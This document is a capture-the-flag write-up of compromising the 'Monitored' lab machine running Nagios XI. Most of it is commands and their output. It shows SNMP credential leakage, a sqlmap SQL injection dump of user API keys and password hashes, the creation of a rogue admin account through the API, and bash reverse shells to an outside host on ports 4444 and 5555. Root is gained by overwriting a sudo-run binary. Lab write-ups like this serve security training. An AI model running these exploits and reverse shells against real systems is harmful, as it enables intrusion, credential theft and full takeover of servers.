TCP Scan

> TARGET=10.10.11.248 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp   open  http       syn-ack ttl 63 Apache httpd 2.4.56
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
|_http-server-header: Apache/2.4.56 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
389/tcp  open  ldap       syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   syn-ack ttl 63 Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Nagios XI
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth
| Issuer: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
5667/tcp open  tcpwrapped syn-ack ttl 63


# UDP scan
> nmap --top-ports 1000 --min-rate=1000 -T4 10.10.11.248 -Pn -sU -vvv
PORT     STATE SERVICE    REASON         VERSION
123/udp   open          ntp               udp-response ttl 63
161/udp   open          snmp              udp-response ttl 63

• Add entry 10.10.11.248 monitored.htb nagios.monitored.htb to /etc/hosts

port 80

• subdomain

> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://monitored.htb/" -H "Host: FUZZ.monitored.htb" --hw 28

000000167:   302        9 L      26 W       298 Ch      "nagios"

• Browse https://monitored.htb/, redirected to https://nagios.monitored.htb/, which contains a link:

https://nagios.monitored.htb/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

• Searching for known vulns, found the following

https://medium.com/@n1ghtcr4wl3r/nagios-xi-vulnerability-cve-2023-40931-sql-injection-in-banner-ace8258c5567

• Try exploit, need to find a valid user session

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" --cookie "nagiosxi=<cookie>" --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump

• Try password bruteforce, by searching online, the default username is nagiosadmin

hydra -l nagiosadmin -P /usr/share/wordlists/rockyou.txt nagios.monitored.htb http-post-form "/nagiosxi/login.php:nsp=5043187f97faa06528ff803090083d2491f3e40df62099ba7b272c910c48dd24&page=auth&debug=&pageopt=login&redirect=%2Fnagiosxi%2Findex.php%3F&username=nagiosadmin&password=^PASS^&loginButton=:F=Invalid"
[no find]

port 5667

• Check info on port 5667

> nc -v monitored.htb 5667                                                
monitored.htb [10.10.11.248] 5667 (nsca) open

• Searching for nsca found the following

https://support.nagios.com/kb/article/nsca-server-firewall-rules-85.html
https://www.exploit-db.com/exploits/46221

• Try https://www.exploit-db.com/exploits/46221, not working, need to find the version.

port 389

ldapsearch -x -H ldap://monitored.htb -D '<DOMAIN>\<username>' -w '<password>' -b '' "(objectClass=*)" "*" +

ldapsearch -H ldap://monitored.htb/ -D 'nagios' -w '' -x -s base -b '' "(objectClass=*)" "*" +

> ldapsearch -H ldap://monitored.htb/ -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * + 
#

#
dn:
objectClass: top
objectClass: OpenLDAProotDSE
structuralObjectClass: OpenLDAProotDSE
configContext: cn=config
namingContexts: dc=monitored,dc=htb
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 1.3.6.1.4.1.4203.1.10.1
supportedControl: 1.3.6.1.1.22
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.826.0.1.3344810.2.3
supportedControl: 1.3.6.1.1.13.2
supportedControl: 1.3.6.1.1.13.1
supportedControl: 1.3.6.1.1.12
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedExtension: 1.3.6.1.1.8
supportedFeatures: 1.3.6.1.1.14
supportedFeatures: 1.3.6.1.4.1.4203.1.5.1
supportedFeatures: 1.3.6.1.4.1.4203.1.5.2
supportedFeatures: 1.3.6.1.4.1.4203.1.5.3
supportedFeatures: 1.3.6.1.4.1.4203.1.5.4
supportedFeatures: 1.3.6.1.4.1.4203.1.5.5
supportedLDAPVersion: 3
supportedSASLMechanisms: DIGEST-MD5
supportedSASLMechanisms: NTLM
supportedSASLMechanisms: CRAM-MD5
entryDN:
subschemaSubentry: cn=Subschema

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1


> nmap -n -sV --script "ldap* and not brute" monitored.htb     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 10:27 NZDT
Nmap scan report for monitored.htb (10.10.11.248)
Host is up (0.046s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       namingContexts: dc=monitored,dc=htb
|       supportedControl: 2.16.840.1.113730.3.4.18
|       supportedControl: 2.16.840.1.113730.3.4.2
|       supportedControl: 1.3.6.1.4.1.4203.1.10.1
|       supportedControl: 1.3.6.1.1.22
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.826.0.1.3344810.2.3
|       supportedControl: 1.3.6.1.1.13.2
|       supportedControl: 1.3.6.1.1.13.1
|       supportedControl: 1.3.6.1.1.12
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|       supportedExtension: 1.3.6.1.1.8
|       supportedLDAPVersion: 3
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: NTLM
|       supportedSASLMechanisms: CRAM-MD5
|_      subschemaSubentry: cn=Subschema
| ldap-search: 
|   Context: dc=monitored,dc=htb
|     dn: dc=monitored,dc=htb
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: monitored.htb
|_        dc: monitored
443/tcp open  ssl/http Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: Hosts: nagios.monitored.htb, 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.36 seconds

udp 161

> snmpwalk -v 2c -c public monitored.htb
iso.3.6.1.2.1.25.4.2.1.5.537 = STRING: "--config /etc/laurel/config.toml"
iso.3.6.1.2.1.25.4.2.1.5.559 = STRING: "-4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0"
iso.3.6.1.2.1.25.4.2.1.5.568 = ""
iso.3.6.1.2.1.25.4.2.1.5.607 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.609 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
iso.3.6.1.2.1.25.4.2.1.5.614 = STRING: "-n -iNONE"
iso.3.6.1.2.1.25.4.2.1.5.616 = ""
iso.3.6.1.2.1.25.4.2.1.5.617 = STRING: "-u -s -O /run/wpa_supplicant"
iso.3.6.1.2.1.25.4.2.1.5.620 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.634 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB "
iso.3.6.1.2.1.25.4.2.1.5.728 = ""
iso.3.6.1.2.1.25.4.2.1.5.729 = ""
iso.3.6.1.2.1.25.4.2.1.5.780 = STRING: "-LOw -f -p /run/snmptrapd.pid"
iso.3.6.1.2.1.25.4.2.1.5.791 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.797 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.811 = STRING: "-p /var/run/ntpd.pid -g -u 108:116"
iso.3.6.1.2.1.25.4.2.1.5.812 = ""
iso.3.6.1.2.1.25.4.2.1.5.858 = STRING: "-q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit"
iso.3.6.1.2.1.25.4.2.1.5.862 = STRING: "-h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d"
iso.3.6.1.2.1.25.4.2.1.5.864 = STRING: "-q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit"
iso.3.6.1.2.1.25.4.2.1.5.874 = STRING: "-D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf"
iso.3.6.1.2.1.25.4.2.1.5.892 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = ""
iso.3.6.1.2.1.25.4.2.1.5.894 = ""
iso.3.6.1.2.1.25.4.2.1.5.895 = ""
iso.3.6.1.2.1.25.4.2.1.5.896 = ""
iso.3.6.1.2.1.25.4.2.1.5.897 = ""
iso.3.6.1.2.1.25.4.2.1.5.955 = ""
iso.3.6.1.2.1.25.4.2.1.5.961 = STRING: "/usr/sbin/snmptt --daemon"
iso.3.6.1.2.1.25.4.2.1.5.962 = STRING: "/usr/sbin/snmptt --daemon"
iso.3.6.1.2.1.25.4.2.1.5.978 = STRING: "-pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6"
iso.3.6.1.2.1.25.4.2.1.5.1424 = STRING: "-bd -q30m"
iso.3.6.1.2.1.25.4.2.1.5.1427 = STRING: "-u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.1428 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.1786 = STRING: "-d /usr/local/nagios/etc/nagios.cfg"
iso.3.6.1.2.1.25.4.2.1.5.1789 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.1790 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.1791 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.1792 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.1917 = STRING: "-d /usr/local/nagios/etc/nagios.cfg"
iso.3.6.1.2.1.25.4.2.1.5.4464 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.4489 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.5421 = ""
iso.3.6.1.2.1.25.4.2.1.5.6053 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11735 = ""
iso.3.6.1.2.1.25.4.2.1.5.16105 = ""
iso.3.6.1.2.1.25.4.2.1.5.20816 = ""
iso.3.6.1.2.1.25.4.2.1.5.21286 = ""
iso.3.6.1.2.1.25.4.2.1.5.21525 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.21526 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.21549 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.21557 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.21597 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.21600 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.21602 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.21611 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.22249 = ""
iso.3.6.1.2.1.25.4.2.1.5.22604 = ""
iso.3.6.1.2.1.25.4.2.1.5.23126 = STRING: "60"
iso.3.6.1.2.1.25.4.2.1.5.23127 = ""
iso.3.6.1.2.1.25.4.2.1.5.23139 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.23140 = STRING: "-c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1"
iso.3.6.1.2.1.25.4.2.1.5.23141 = STRING: "-q /usr/local/nagiosxi/cron/cmdsubsys.php"

back to port 80

• Use the obtained cred from above, try login as svc, says

The specified user account has been disabled or does not exist.

• try get a token from the api, according to this: https://support.nagios.com/forum/viewtopic.php?t=58783

> curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'

• and try sqli

> sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message&token=78f033e6d69d8ada5853acafa2e7181e1ba1e774" --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump

Database: nagiosxi
Table: xi_users
[3 entries]
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | email               | name                 | api_key                                                          | enabled | password                                                     | username    | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket                                                   | last_edited_by | login_attempts | last_password_change |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1       | admin@monitored.htb | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1       | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0          | 1701931372 | 1           | 1701427555  | 0            | 1712181219   | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0                                 | 5              | 5              | 1701427555           |
| 2       | svc@monitored.htb   | svc                  | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0       | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc         | 1          | 1699724476 | 1           | 1699728200  | 1699634403   | 1712182343   | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1              | 4              | 1699697433           |
| 6       | rev1ve@localhost    | rev1ve               | 69996NkvgD4g3M0CraLOBDOfPVqPSbKC57Tb9js8YRTNafmDDBf4iKKj209ZKNg0 | 1       | $2a$10$f93c46975619d6c4b695cOOEfZegCSEfYC31GiMm/p0p3aMgHdS0. | rev1ve      | 0          | 1712159319 | 0           | 0           | 0            | 0            | IefuNLtHmkaKUWUtVUJMEdfuasuA6BVMjuZLF06VA0qHeT3LdghUWRZDAuhV7seN | 0              | 0              | 1712159613           |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+

• password hash not crackable using john --wordlist=/usr/share/wordlists/rockyou.txt hash
• use the admin’s api key to add user: https://support.nagios.com/forum/viewtopic.php?t=42923

curl -XPOST "http://monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=meow&password=test&name=test%20test&email=test@localhost&&auth_level=admin"

• login, version is Nagios XI 5.11.0
• can find many configured commands here: https://nagios.monitored.htb/nagiosxi/includes/components/ccm/xi-index.php
• define a command

bash -c 'bash -i >& /dev/tcp/10.10.16.30/4444 0>&1'

• go to https://nagios.monitored.htb/nagiosxi/includes/components/ccm/xi-index.php and Run check command

> rlwrap nc -vnlp 4444                                                    
listening on [any] 4444 ...
connect to [10.10.16.30] from (UNKNOWN) [10.10.11.248] 33786
bash: cannot set terminal process group (27013): Inappropriate ioctl for device
bash: no job control in this shell
nagios@monitored:~$ id
id
uid=1001(nagios) gid=1001(nagios) groups=1001(nagios),1002(nagcmd)
nagios@monitored:~$ ls
ls
cookie.txt
user.txt
nagios@monitored:~$ cat user.txt
cat user.txt
9c0c66ea5262f54fa3f63e3434796421

pe

nagios@monitored:/home$ sudo -l
sudo -l
Matching Defaults entries for nagios on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nagios may run the following commands on localhost:
    (root) NOPASSWD: /etc/init.d/nagios start
    (root) NOPASSWD: /etc/init.d/nagios stop
    (root) NOPASSWD: /etc/init.d/nagios restart
    (root) NOPASSWD: /etc/init.d/nagios reload
    (root) NOPASSWD: /etc/init.d/nagios status
    (root) NOPASSWD: /etc/init.d/nagios checkconfig
    (root) NOPASSWD: /etc/init.d/npcd start
    (root) NOPASSWD: /etc/init.d/npcd stop
    (root) NOPASSWD: /etc/init.d/npcd restart
    (root) NOPASSWD: /etc/init.d/npcd reload
    (root) NOPASSWD: /etc/init.d/npcd status
    (root) NOPASSWD: /usr/bin/php
        /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
    (root) NOPASSWD: /usr/bin/php
        /usr/local/nagiosxi/scripts/migrate/migrate.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *

• upload linpeas

SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
You can write SUID file: /usr/local/nagios/libexec/check_icmp
You can write SUID file: /usr/local/nagios/libexec/check_dhcp

-rwsr-xr-x 1 root root 1.3M Jan  1 12:00 /usr/sbin/exim4
-rwsr-xr-x 1 root root 471K Dec 21 11:09 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Jan 20  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 71K Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 179K Jan 14  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 35K Feb 26  2021 /usr/bin/fusermount
-rwsr-xr-x 1 root root 35K Jan 20  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd

══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:  0x0000000000000000=

══╣ Parent process capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/ping cap_net_raw=ep
/usr/bin/fping cap_net_raw=ep


╔══════════╣ Readable files belonging to root and readable by me but not world readable
-r-xr-x--- 1 root nagios 3820 Nov  9 10:44 /usr/local/nagiosxi/scripts/manage_ssl_config.sh
-r-xr-x--- 1 root nagios 7861 Nov  9 10:44 /usr/local/nagiosxi/scripts/backup_xi.sh
-r-xr-x--- 1 root nagios 9615 Nov  9 10:44 /usr/local/nagiosxi/scripts/pg2mysql/convert_nagiosxi_to_mysql.php
-r-xr-x--- 1 root nagios 6166 Nov  9 10:44 /usr/local/nagiosxi/scripts/reset_config_perms.sh
-r-xr-x--- 1 root nagios 1654 Nov  9 10:44 /usr/local/nagiosxi/scripts/repair_databases.sh
-r-xr-x--- 1 root nagios 1914 Nov  9 10:44 /usr/local/nagiosxi/scripts/change_timezone.sh
-r-xr-x--- 1 root nagios 1270 Nov  9 10:44 /usr/local/nagiosxi/scripts/import_xiconfig.php
-r-xr-x--- 1 root nagios 3917 Nov  9 10:44 /usr/local/nagiosxi/scripts/manage_services.sh
-r-xr-x--- 1 root nagios 4153 Nov  9 10:44 /usr/local/nagiosxi/scripts/repairmysql.sh
-r-xr-x--- 1 root nagios 2914 Nov  9 10:44 /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
-r-xr-x--- 1 root nagios 1534 Nov  9 10:44 /usr/local/nagiosxi/scripts/send_to_nls.php
-r-xr-x--- 1 root nagios 281115 Nov  9 10:44 /usr/local/nagiosxi/scripts/components/autodiscover_new.php
-r-xr-x--- 1 root nagios 16693 Nov  9 10:44 /usr/local/nagiosxi/scripts/components/getprofile.sh
-r-xr-x--- 1 root nagios 6296 Nov  9 10:44 /usr/local/nagiosxi/scripts/migrate/nagios_bundler.py
-r-xr-x--- 1 root nagios 8612 Nov  9 10:44 /usr/local/nagiosxi/scripts/migrate/migrate.php
-r-xr-x--- 1 root nagios 18851 Nov  9 10:44 /usr/local/nagiosxi/scripts/migrate/nagios_unbundler.py
-r-xr-x--- 1 root nagios 999 Nov  9 10:44 /usr/local/nagiosxi/etc/xi-sys.cfg
-rw-r----- 1 root nagios 33 Apr  3 11:43 /home/nagios/user.txt

• manage_services.sh can be used to start/stop services, one of them is npcd, owned by the current user

nagios@monitored:~$ find / -type f -name npcd 2>/dev/null
find / -type f -name npcd 2>/dev/null
/usr/local/nagios/bin/npcd
nagios@monitored:~$ ls -ls /usr/local/nagios/bin/npcd
ls -ls /usr/local/nagios/bin/npcd
4 -rwxr-xr-x 1 nagios nagios 41 Apr  3 12:41 /usr/local/nagios/bin/npcd

• overwrite npcd with the following

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.16.30/5555 0>&1' > /usr/local/nagios/bin/npcd


> rlwrap nc -vnlp 5555
listening on [any] 5555 ...
connect to [10.10.16.30] from (UNKNOWN) [10.10.11.248] 34578
bash: cannot set terminal process group (52457): Inappropriate ioctl for device
bash: no job control in this shell
root@monitored:/# cat /root/root.txt
cat /root/root.txt
c5f66c1585975cabf27ae6dcbd68c4e1
root@monitored:/#

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack